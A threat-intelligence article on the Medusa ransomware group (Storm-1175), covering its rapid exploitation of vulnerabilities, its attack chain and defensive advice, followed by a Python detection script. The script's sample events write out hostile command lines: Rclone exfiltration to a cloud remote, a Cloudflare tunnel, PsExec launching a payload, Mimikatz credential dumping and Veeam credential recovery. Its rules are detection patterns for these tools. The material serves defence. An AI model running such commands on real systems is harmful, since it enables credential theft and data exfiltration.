The Medusa ransomware group, tracked by Microsoft as Storm-1175, has emerged as one of the most operationally aggressive ransomware actors currently active. First observed in June 2021 and now operating as a ransomware-as-a-service (RaaS) platform, Medusa had compromised over 300 organizations in critical infrastructure sectors by February 2025, and the pace is accelerating. New research from Microsoft reveals the group exploiting freshly disclosed vulnerabilities within a single day of public disclosure and, in some cases, weaponizing zero-day flaws up to seven days before they are publicly known.
Who Is Medusa Ransomware (Storm-1175)?
Medusa is a double-extortion ransomware operation, meaning its operators both encrypt victim data and exfiltrate it, threatening to publish stolen files if ransoms go unpaid. This dual pressure maximizes leverage against victims who might otherwise restore from backups. The group has demonstrated particular interest in high-value, downtime-sensitive sectors, including:
- Healthcare organizations
- Educational institutions
- Professional services firms
- Financial sector entities
Recent intrusions have been concentrated in Australia, the United Kingdom, and the United States, with healthcare organizations bearing a disproportionate share of the damage. Hospitals and insurers, already stretched thin with minimal downtime tolerance and chronic patching backlogs, are particularly vulnerable to a threat actor that can identify and exploit exposed assets faster than defenders can respond.
Alarmingly Fast Exploitation of Vulnerabilities
What distinguishes Medusa from many ransomware groups is its operational tempo. Microsoft's threat intelligence team observed Storm-1175 moving from initial access to post-compromise operations — including data exfiltration and ransomware execution — within a single day. In some intrusions, this entire attack chain was completed in a matter of hours.
Over the past three years, Medusa's operators have exploited at least 16 distinct vulnerabilities across widely deployed enterprise products, including:
- Microsoft Exchange
- Ivanti Connect Secure and Policy Secure
- ConnectWise ScreenConnect
- JetBrains TeamCity
- SAP NetWeaver
- CrushFTP and GoAnywhere MFT
- SmarterMail and BeyondTrust
- PaperCut and SimpleHelp
The group was observed exploiting a critical SAP NetWeaver vulnerability just one day after its public disclosure on April 24, 2025 — a timeline that leaves virtually no window for defenders to patch before exploitation begins.
Zero-Day Exploitation: Attacking Before the World Knows
Perhaps the most alarming aspect of Microsoft's findings is Medusa's use of zero-day vulnerabilities. According to the report, Storm-1175 has exploited at least three confirmed zero-day flaws, including:
- CVE-2026-23760 — a zero-day in SmarterMail
- CVE-2025-10035 — a zero-day in GoAnywhere MFT
In some cases, the group exploited these flaws up to seven days before they were publicly disclosed. This suggests that Storm-1175 either finds vulnerabilities through its own research or obtains working exploits ahead of disclosure, a capability more typically associated with sophisticated nation-state actors than with financially motivated cybercriminals.
The group has also targeted Linux systems, including Oracle WebLogic instances, and has chained multiple security defects together to achieve remote code execution (RCE) on victim systems.
The Attack Chain: From Foothold to Full Encryption in Hours
Once initial access is established — typically via phishing or vulnerability exploitation — Storm-1175 follows a rapid, well-rehearsed playbook:
- Deploys a web shell or remote access payload to maintain persistence
- Performs reconnaissance and lateral movement across the network
- Modifies firewall rules to enable persistent remote access
- Harvests and exfiltrates credentials, including from Veeam backup software
- Executes file-encrypting ransomware across all reachable systems
Microsoft specifically noted that after obtaining administrator credentials, Storm-1175 runs a script to recover the passwords stored by Veeam backup software. A Veeam Backup & Replication server holds credentials for every system it protects (hypervisors, guest operating systems, database servers, storage), so recovering them gives the group valid logins to any remote host connected via Veeam and dramatically expands the blast radius of the ransomware deployment.
Tools and Techniques: Living Off the Land
To evade detection and blend into legitimate administrative activity, Medusa's operators heavily rely on living-off-the-land binaries (LOLBins) — legitimate tools that are already present on most enterprise systems. The group's observed toolkit includes:
- PowerShell and PsExec for remote execution
- Cloudflare Tunnels to mask command-and-control traffic
- Remote Desktop Protocol (RDP) and various RMM tools for lateral movement
- PDQ Deployer for payload distribution
- Impacket and Mimikatz for credential harvesting
- Bandizip and Rclone for data staging and exfiltration
Because these are legitimate, often signed binaries, signature-based detection has little to key on; what gives the intrusion away is context (where the binary runs from, who launched it, what it is pointed at, and which other stages of the playbook appear on the same host). That is why behavioral, anomaly-based monitoring is needed rather than signature-only defenses.
The Double-Extortion Threat Beyond Ransomware
"If unchecked, the impact is bigger than a single encrypted network segment. Medusa is built for double extortion, so the ransom threat is not just downtime — it's the risk of public data exposure and downstream fallout like regulatory penalties, partner distrust, and long tail fraud from stolen data."
— Pete Luban, Field CISO, AttackIQ
Organizations in regulated industries like healthcare and finance face a compounded risk: not only operational disruption from encryption, but the potential for HIPAA violations, GDPR fines, and reputational damage if stolen patient or financial records are leaked publicly. Medusa has demonstrated a willingness to follow through on these threats, making negotiation and recovery far more complex than a traditional ransomware scenario.
How Organizations Can Defend Against Medusa
Given Storm-1175's speed and sophistication, defenders need to operate proactively rather than reactively. Security experts recommend the following measures:
- Continuous asset inventory: Maintain an up-to-date map of all internal and external-facing systems, especially those exposed to the internet.
- Aggressive patch cadence: Prioritize patching for internet-facing systems and subscribe to threat intelligence feeds to detect zero-day exploitation attempts early.
- Credential hygiene: Treat the backup server as a Tier 0 asset. Run Veeam and similar products under dedicated least-privilege service accounts rather than domain administrators, restrict who can log on to the backup server, and audit the credentials it stores so that a compromise of the backup console does not yield logins to every protected system.
- Network segmentation: Limit lateral movement by segmenting critical systems and enforcing least-privilege access controls.
- Behavioral monitoring: Deploy EDR and SIEM solutions tuned to detect LOLBin abuse, unusual RDP sessions, and anomalous Rclone or PowerShell activity.
- Incident response readiness: Ensure IR plans are tested and that offline or immutable backup copies exist that cannot be deleted or encrypted using the credentials held by Veeam or a similar backup platform.
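The behavioral-monitoring recommendation above and the living-off-the-land tooling described earlier (PsExec, Cloudflare Tunnel, Rclone, Mimikatz/Impacket, archivers for staging, and the Veeam credential-recovery step) can be turned into a first-pass detection. The Python below is an added example written for this article, not code from Microsoft's report or from any vendor product. The process-creation events it scans are constructed to resemble Sysmon Event ID 1 / EDR telemetry and do not come from a real intrusion; the rule patterns, severity weights and the list of "suspicious" launch directories are assumptions a team would tune to its own environment. It scores each host and flags hosts on which more than one stage of the playbook (staging, exfiltration, tunnelling, lateral movement, credential access) appears, which is the signal that separates an intrusion from a lone administrator running a dual-use tool.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed process-creation events shaped like Sysmon Event ID 1 / EDR telemetry.
# Illustrative only; not taken from a real Medusa intrusion.
EVENTS = [
    {"host": "wks17", "user": "CORP\\jdoe", "parent": "explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem C:\\Users\\jdoe\\Documents"},
    {"host": "fs01", "user": "CORP\\jdoe", "parent": "explorer.exe",
     "image": "C:\\Program Files\\Bandizip\\Bandizip.exe",
     "cmdline": "Bandizip.exe c -cmt C:\\Users\\jdoe\\archive.zip D:\\Finance"},
    {"host": "fs01", "user": "CORP\\administrator", "parent": "cmd.exe",
     "image": "C:\\Temp\\rclone.exe",
     "cmdline": "rclone.exe copy D:\\Finance mega:dump --transfers 32 -q"},
    {"host": "dc01", "user": "CORP\\administrator", "parent": "powershell.exe",
     "image": "C:\\Windows\\Temp\\cloudflared.exe",
     "cmdline": "cloudflared.exe tunnel run --token <token>"},
    {"host": "dc01", "user": "CORP\\administrator", "parent": "cmd.exe",
     "image": "C:\\Users\\Public\\PsExec64.exe",
     "cmdline": "PsExec64.exe \\\\srv05 -s -d cmd /c C:\\Users\\Public\\payload.exe"},
    {"host": "dc01", "user": "CORP\\administrator", "parent": "cmd.exe",
     "image": "C:\\Users\\Public\\mimikatz.exe",
     "cmdline": "mimikatz.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" exit"},
    {"host": "veeam01", "user": "CORP\\administrator", "parent": "cmd.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -ep bypass -f C:\\Temp\\get-creds.ps1 VeeamBackup dbo.Credentials"},
]


@dataclass
class Finding:
    host: str
    technique: str   # "<stage>: <detail>"; the stage prefix drives correlation
    severity: int
    cmdline: str


# Assumed rules: (technique label, base severity 1-3, regex over image + command line).
# Each label starts with the playbook stage it evidences.
RULES = [
    ("exfiltration: rclone to a cloud remote", 3,
     re.compile(r"\brclone(?:\.exe)?\b.*\b(copy|sync|move)\b.*\s\w{2,}:\S*", re.I)),
    ("c2 tunnel: cloudflared tunnel", 3,
     re.compile(r"\bcloudflared(?:\.exe)?\b.*\btunnel\b", re.I)),
    ("lateral movement: PsExec against a remote host", 2,
     re.compile(r"\bpsexec(?:64)?(?:\.exe)?\b\s+\\\\\S+", re.I)),
    ("credential harvesting: Mimikatz/Impacket", 3,
     re.compile(r"\b(mimikatz|sekurlsa|secretsdump|lsassy|impacket)\b", re.I)),
    ("credential harvesting: Veeam backup credentials", 3,
     re.compile(r"veeambackup.*credentials|credentials.*veeambackup", re.I)),
    ("staging: archiver run over data", 1,
     re.compile(r"\b(bandizip|7z|winrar)(?:\.exe)?\b", re.I)),
]

# Assumed list of launch directories that legitimate admin tooling rarely uses.
SUSPICIOUS_DIRS = re.compile(r"\\(temp|tmp|users\\public|programdata)\\", re.I)


def match_event(ev):
    """Return the findings a single process-creation event produces."""
    findings = []
    text = f"{ev['image']} {ev['cmdline']}"
    for technique, severity, rx in RULES:
        if rx.search(text):
            # The same tool dropped into a scratch directory is more suspicious than
            # a copy under Program Files, so add one point for the launch location.
            bump = 1 if SUSPICIOUS_DIRS.search(ev["image"]) else 0
            findings.append(Finding(ev["host"], technique, severity + bump, ev["cmdline"]))
    return findings


def analyze(events):
    """Aggregate findings per host and flag hosts showing more than one playbook stage."""
    per_host = defaultdict(list)
    for ev in events:
        per_host[ev["host"]].extend(match_event(ev))
    report = {}
    for host, fs in per_host.items():
        stages = {f.technique.split(":")[0] for f in fs}
        report[host] = {
            "score": sum(f.severity for f in fs),
            "stages": sorted(stages),
            "multi_stage": len(stages) >= 2,
            "findings": [f.technique for f in fs],
        }
    return report


if __name__ == "__main__":
    ranked = sorted(analyze(EVENTS).items(), key=lambda kv: -kv[1]["score"])
    for host, summary in ranked:
        flag = "ALERT " if summary["multi_stage"] else "      "
        print(f"{flag}{host:<8} score={summary['score']:<3} stages={summary['stages']}")
```

On the constructed sample, the workstation running an ordinary PowerShell cmdlet scores zero, the file server that first archives a finance share and then pushes it to a cloud remote with Rclone is flagged as multi-stage, and the domain controller showing a tunnel, PsExec and Mimikatz together ranks highest. The Veeam server produces a single high-severity finding; in practice that one should page on its own, since credential recovery from the backup server is the step that precedes fleet-wide encryption.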
Conclusion
Medusa ransomware represents a new tier of financially motivated threat actor — one that combines nation-state-level vulnerability research with an industrialized RaaS delivery model. The group's ability to exploit zero-days before public disclosure, compress the attack timeline to a matter of hours, and specifically target organizations least able to absorb disruption makes it a critical threat for 2025 and beyond. Organizations in healthcare, finance, and education must treat perimeter exposure as an emergency, invest in proactive threat hunting, and assume that patching windows are measured in hours, not weeks. Against Storm-1175, there is no such thing as a comfortable patch cycle.